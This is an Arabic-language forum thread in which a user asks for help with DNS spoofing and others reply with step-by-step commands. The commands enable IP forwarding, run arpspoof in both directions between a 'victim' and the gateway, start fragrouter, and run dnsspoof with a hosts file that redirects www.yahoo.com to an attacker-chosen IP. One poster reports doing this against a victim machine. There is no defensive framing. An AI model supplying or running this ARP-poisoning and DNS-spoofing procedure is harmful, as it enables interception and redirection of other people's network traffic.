تويت
dns spoofing
اريد عمل dns spoofing وقد حاولت ذلك باستخدام الاداة dnsspoof من dsniff ولكن لم اجد اي نتائج فهل هناك احد يساعدني سواء بهذه الاداة او باداة اخرى
-
-
السطر الاول يقوم بتفعيل خاصية ال ip fowardكود:echo 1 > /proc/sys/net/ipv4/ip_forward
الخاصية المهمة لتحويل الاتصالات عن طريق جهازك لانه جهازك حيكون كعبارة للشبكة
ومهمة في حالة عمل الجهاز كروتر ولابطال الخاصية نرد القيمة الي صفر
راجعوا الرابط
http://ipsysctl-tutorial.frozentux.n...-tutorial.html
كود:arpspoof -t 192.168.1.245 192.168.1.5 &
الامرين اعلاه لنمرير كافة الاتصالات القادمة من خادم الدي ان اس والخارجة الى الدي ان اس من خلال جهازككود:arpspoof -t 192.168.1.5 192.168.1.245 &
الامر الاول تفعيل خاصية تمرير الاتصالات تظهر اهميتها هنا حتى لا يتم قطع الاتصالات بين الخادم والعملاء
وعلامة ال & لتشغيلهم في الخلفية بدل ما تفتح تيرمنال جديد لكل امر
ولتحديد عنوان سيرفر الدي ان اس استخدم الامر nslookup www.linuxac.com
واخيرا امر السبوف تحدد سيرفر الدي ان اس والبورت والبرتوكول الخاص بالدي ان اسكود:dnsspoof -f spoofhosts host 192.168.1.245 and udp port 53
بعضكم حيسال كيف اعرف البورت والبروتوكول الخاص بالدي ان اس
1 - اللي فوق افتراضي
2- استخدم اي اداة مسح مثل النت ماب
على فكرة الشرح منقول بالانجليزي باقي نجربه ونتاكدMy sickness is called frozen mind
and hopefully I'll find the cure for it
-
شكرا اخي على الشرح الموفق ان شاء الله اجرب انا ايضاتعليق
-
اشكرك
اشكرك على الشرح بس انا كنت عملت كل هذه الخطوات بس يبدو ان هناك بعض الاخطاء اولها اني في الخطوة
arpspoof -t 192.168.0.2 192.168.0.7
حيث ان 192.168.0.2 هو عنوان السيرفر وعلى ما اظن ان المفترض ان اضع عنوان السويتش فهل هذا صحيح او لا
وثانيا اني وضعت البورت الافتراضي 53 ولم اتوقع انه يمكن ان يكون مختلف فكيف يمكنني ان اعرف البورت انت قلت استخدم برنامج مسح انا عندي سوبرسكان ولكن على اي اساس اعمل المسح
واشكرك كثيرا على الردتعليق
-
اعتقد المفروض تحط عنوان البوابة ( gateway )شكرك على الشرح بس انا كنت عملت كل هذه الخطوات بس يبدو ان هناك بعض الاخطاء اولها اني في الخطوة
arpspoof -t 192.168.0.2 192.168.0.7
حيث ان 192.168.0.2 هو عنوان السيرفر وعلى ما اظن ان المفترض ان اضع عنوان السويتش فهل هذا صحيح او لا
لانه جميع الاتصالات تتم عن طريقها
استخدم النت مابوثانيا اني وضعت البورت الافتراضي 53 ولم اتوقع انه يمكن ان يكون مختلف فكيف يمكنني ان اعرف البورت انت قلت استخدم برنامج مسح انا عندي سوبرسكان ولكن على اي اساس اعمل المسح
الموضوع موجود في القسم ابحث عنهMy sickness is called frozen mind
and hopefully I'll find the cure for it
تعليق
-
شرح dns spoofing
وعدتكم لما اعمل dns spoofing حشرح لكم
اول شي عملت ip forwarding وكنت قبل عملتها بالامر echo1> /proc/sys/net/ipv4/ip_forward
ولكن عندما لم احصل على نتائج لاني لقيت الخط يفصل على الضحية فغيرت واستخدمت البرنامج fragrouter
Fragrouter –B1 ونترك هذه النافذة مفتوحة
وبعدين استخدمت الامر
Arpspoof –t 192.168.10.5 192.168.10.254
Arpspoof –t 192.168.10.254 192.168.10.5
حيث 192.168.10.5 هو الضحية
192.168.10.254 gateway
وبعدها عملت التقاط للبيانات بالبرنامج netwag ويمكن ان تستخدمو أي برنامج اخر
وبعدها نفتح الملف hostfile ونكتب
www.yahoo.com 66.54.34.45
ثم نفتح نافذة جديدة ونكتب
Dnsspoof –i hostfile
والان اول ما الضحية يطلب الموقع الياهو يبعث البرنامج الايبي الذي كتبناه في الملف فلو كان هذا الايبي لموقع مثل linuxac تظهر صفحة هذا الموقع للضحية بدل من موقع الياهوتعليق
-
الىكود:echo1> /proc/sys/net/ipv4/ip_forward
كود:echo "1" > /proc/sys/net/ipv4/ip_forward
My sickness is called frozen mind
and hopefully I'll find the cure for it
تعليق
تعليق